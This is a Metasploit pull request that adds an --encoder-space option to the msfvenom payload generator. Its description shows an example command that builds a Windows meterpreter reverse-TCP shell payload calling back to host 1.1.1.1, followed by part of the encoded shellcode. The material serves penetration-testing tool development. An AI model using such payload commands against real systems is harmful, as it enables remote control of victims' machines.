### PR TITLE
Fixes #5361 by adding --encoder-space to msfvenom

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -64,6 +64,9 @@ module Msf
     # @!attribute  space
     #   @return [Fixnum] The maximum size in bytes of the payload
     attr_accessor :space
+    # @!attribute  encoder_space
+    #   @return [Fixnum] The maximum size in bytes of the encoded payload
+    attr_accessor :encoder_space
     # @!attribute  stdin
     #   @return [String] The raw bytes of a payload taken from STDIN
     attr_accessor :stdin
@@ -85,6 +88,7 @@ module Msf
     # @option opts [String] :badchars (see #badchars)
     # @option opts [String] :template (see #template)
     # @option opts [Fixnum] :space (see #space)
+    # @option opts [Fixnum] :encoder_space (see #encoder_space)
     # @option opts [Fixnum] :nops (see #nops)
     # @option opts [String] :add_code (see #add_code)
     # @option opts [Boolean] :keep (see #keep)
@@ -109,6 +113,7 @@ module Msf
       @stdin      = opts.fetch(:stdin, nil)
       @template   = opts.fetch(:template, '')
       @var_name   = opts.fetch(:var_name, 'buf')
+      @encoder_space = opts.fetch(:encoder_space, @space)
 
       @framework  = opts.fetch(:framework)
 
@@ -200,7 +205,7 @@ module Msf
         encoder_list.each do |encoder_mod|
           cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
           begin
-            encoder_mod.available_space = @space
+            encoder_mod.available_space = @encoder_space
             return run_encoder(encoder_mod, shellcode.dup)
           rescue ::Msf::EncoderSpaceViolation => e
             cli_print "#{encoder_mod.refname} failed with #{e.message}"
@@ -395,7 +400,7 @@ module Msf
       iterations.times do |x|
         shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list)
         cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})"
-        if shellcode.length > space
+        if shellcode.length > encoder_space
           raise EncoderSpaceViolation, "encoder has made a buffer that is too big"
         end
       end

--- a/msfvenom
+++ b/msfvenom
@@ -97,6 +97,10 @@ require 'msf/core/payload_generator'
       opts[:space] = s
     end
 
+    opt.on('--encoder-space      <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
+      opts[:encoder_space] = s
+    end
+
     opt.on('-b', '--bad-chars  <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
       opts[:badchars] = Rex::Text.hex_to_raw(b)
     end


### PR DESCRIPTION
This solves the issue raised in #5361 by allowing a separate encoder space value to be passed to msfvenom (--encoder-space). 

Example:

```
$ ./msfvenom -p windows/meterpreter/reverse_tcp exitfunc=thread lhost=1.1.1.1 -a x86 -f c -e x86/alpha_mixed --platform windows -f c -s 0 --encoder-space 623
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 623 (iteration=0)
Payload size: 623 bytes
unsigned char buf[] = 
"\x89\xe6\xdb\xd3\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
...
```
